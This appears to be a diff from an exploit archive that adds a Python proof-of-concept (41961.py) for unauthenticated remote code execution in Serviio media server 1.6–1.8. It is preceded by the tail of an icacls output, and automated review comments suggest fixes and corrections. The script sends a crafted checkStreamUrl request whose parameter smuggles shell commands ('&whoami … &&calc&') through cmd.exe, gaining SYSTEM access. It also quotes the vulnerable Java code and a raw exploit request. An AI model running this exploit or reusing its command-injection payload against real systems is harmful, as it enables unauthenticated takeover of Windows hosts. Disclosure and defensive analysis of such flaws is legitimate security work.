||||||
|
BUILTIN\Administrators:(I)(F)
|
||||||
|
|
||||||
|
Successfully processed 1 files; Failed processing 0 files
|
||||||
|
|
||||||
|
C:\>
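Review bot: The advisory documents the two findings but gives no fix or workaround, although both are visible in the command output: `BINARY_PATH_NAME` is the unquoted `C:\Program Files\Serviio\bin\ServiioService.exe`, and icacls shows `BUILTIN\Users:(I)(F)`, where `(I)` means the Full-control ACE is inherited from the install directory rather than set on the binary itself. A short "Fix / Workaround" paragraph would serve defenders: quote the service's binary path in its configuration, and on the Serviio install directory replace the inherited Full-control entry for Users with read-and-execute so the inherited ACE on the executable disappears with it. It would also be worth stating that, because the service runs as `LocalSystem` with `AUTO_START`, any modification of files under that directory by a non-administrator is a signal worth alerting on until the permissions are corrected.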
|
156
platforms/windows/webapps/41961.py
Executable file
156
platforms/windows/webapps/41961.py
Executable file
|
@ -0,0 +1,156 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
# Product web page: http://www.serviio.org
|
||||||
|
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
|
||||||
|
#
|
||||||
|
# Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
# games console or mobile phone) on your connected home network.
|
||||||
|
#
|
||||||
|
# Desc: The version of Serviio installed on the remote Windows host is affected by
|
||||||
|
# an unauthenticated remote code execution vulnerability due to improper access control
|
||||||
|
# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
|
||||||
|
# calls cmd.exe to execute system commands. A remote attacker can exploit this with a
|
||||||
|
# simple JSON request, gaining system access with SYSTEM privileges via a specially
|
||||||
|
# crafted request and escape sequence.
|
||||||
|
#
|
||||||
|
# =================================================================================
|
||||||
|
# org/serviio/ui/resources/server/ActionsServerResource.java:
|
||||||
|
# -----------------------------------------------------------
|
||||||
|
#
|
||||||
|
# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
|
||||||
|
# this.validateParameters(representation, 2);
|
||||||
|
# try {
|
||||||
|
# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
|
||||||
|
# String url = StringUtils.trim(representation.getParameters().get(1));
|
||||||
|
# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
|
||||||
|
# DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
|
||||||
|
# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
|
||||||
|
# return this.responseOk();
|
||||||
|
# }
|
||||||
|
# catch (InvalidMediaFormatException e) {
|
||||||
|
# return this.responseOk(603);
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# =================================================================================
|
||||||
|
# serviio.jar / external / ProcessExecutor.java:
|
||||||
|
# ----------------------------------------------
|
||||||
|
#
|
||||||
|
# private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
|
||||||
|
# HashMap<String, String> newEnv = new HashMap<String, String>();
|
||||||
|
# newEnv.putAll(System.getenv());
|
||||||
|
# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
|
||||||
|
# i18n[0] = new ProcessExecutorParameter("cmd");
|
||||||
|
# i18n[1] = new ProcessExecutorParameter("/C");
|
||||||
|
# for (int counter = 0; counter < this.commandArguments.length; ++counter) {
|
||||||
|
# ProcessExecutorParameter argument = this.commandArguments[counter];
|
||||||
|
# String envName = "JENV_" + counter;
|
||||||
|
# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
|
||||||
|
# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
|
||||||
|
# if (!quotesNeededForWindows) {
|
||||||
|
# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
|
||||||
|
# }
|
||||||
|
# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
|
||||||
|
# }
|
||||||
|
# this.commandArguments = i18n;
|
||||||
|
# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
|
||||||
|
# newEnv.put("HOMEDRIVE", tempPath[0]);
|
||||||
|
# newEnv.put("HOMEPATH", tempPath[1]);
|
||||||
|
# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
|
||||||
|
# if (log.isTraceEnabled()) {
|
||||||
|
# log.trace(String.format("Env variables: %s", newEnv.toString()));
|
||||||
|
# }
|
||||||
|
# return newEnv;
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
|
||||||
|
# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
|
||||||
|
# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
|
||||||
|
# return quotesNeeded;
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# private String escapeAmpersandForWindows(String value) {
|
||||||
|
# return value.replaceAll("&", "^&");
|
||||||
|
# }
|
||||||
|
#
|
||||||
|
# =================================================================================
|
||||||
|
#
|
||||||
|
# Tested on: Restlet-Framework/2.2
|
||||||
|
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Java/1.8.0_121
|
||||||
|
# Java/1.8.0_111
|
||||||
|
# Java/1.8.0_91
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5408
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
|
||||||
|
#
|
||||||
|
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 12.12.2016
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
|
||||||
|
# output in it and start a calc.exe child process as nt authority\system.
|
||||||
|
#
|
||||||
|
|
||||||
|
from urllib2 import Request, urlopen
|
||||||
|
import sys
|
||||||
|
|
||||||
|
if (len(sys.argv) <= 1):
|
||||||
|
print '[*] Usage: serviio_rce.py <ip address>'
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
|
||||||
|
values = """
|
||||||
|
<action>
|
||||||
|
<name>checkStreamUrl</name>
|
||||||
|
<parameter>VIDEO</parameter>
|
||||||
|
<parameter>1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'</parameter>
|
||||||
|
</action>"""
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
'Content-Type': 'application/xml',
|
||||||
|
'Accept': 'application/xml'
|
||||||
|
}
|
||||||
|
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)
|
||||||
|
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
print response_body
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Raw request:
|
||||||
|
|
||||||
|
POST /rest/action HTTP/1.1
|
||||||
|
Host: 10.211.55.3:23423
|
||||||
|
Content-Length: 93
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
Origin: http://10.211.55.3:23423
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Referer: http://10.211.55.3:23423/console/
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.8
|
||||||
|
DNT: 1
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}
|
||||||
|
|
||||||
|
'''
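Review bot: The header says the attacker needs "a simple JSON request", but the script itself posts an XML `<action>` document with `Content-Type: application/xml`; only the raw-request sample in the trailing docstring is JSON, so the header should say the endpoint accepts both representations (presumably, given the sample) or describe the XML form the code actually sends. Unlike 41958.py and 41960.py there is no `<port>` argument and 23423 is hard-coded into the URL, so the usage string should at least say `[*] Usage: serviio_rce.py <ip address>   (console port 23423 assumed)`. The quoted `createWindowsRuntimeEnvironmentVariables` also shows the root cause more precisely than the header's "unsanitized input": `escapeAmpersandForWindows` is skipped whenever `quotesNeededForWindows` is true, and even when applied it handles a single metacharacter, so a remediation sentence pointing out that the durable fix is to launch the external tool with an argument array rather than through `cmd /C` and `%JENV_n%` expansion would be useful to readers assessing a patch.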
|